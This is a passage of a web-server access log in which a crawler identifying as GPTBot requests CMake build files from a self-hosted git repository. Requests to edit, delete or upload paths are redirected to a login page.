"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:47:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9898] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:18:47:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9883] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:18:47:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:18:47:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:18:47:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:18:47:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:18:47:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10445] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:18:47:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 1515] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:18:47:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:18:47:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:18:47:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:18:47:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:18:47:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:18:47:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:18:47:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 467] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:18:47:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:18:47:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:18:47:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 11709] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:18:47:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12221] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:18:47:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:18:47:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:18:47:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:18:47:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:18:47:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:18:47:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:18:47:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:18:47:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:18:47:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:18:47:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:18:47:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:18:47:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:18:47:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:18:47:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:18:47:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:18:47:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:18:47:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:47:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:47:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:47:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:47:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:18:47:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:18:47:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:18:47:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:18:47:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11781] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:18:47:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 9860] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:47:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 949] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:47:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 10781] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:47:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:47:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9862] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:18:47:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 961] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:18:47:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 777] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:18:47:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:47:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:47:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:18:47:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:18:47:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9836] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:18:47:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:18:47:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:18:47:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:18:47:38 +0000] - 200 200 - GET https 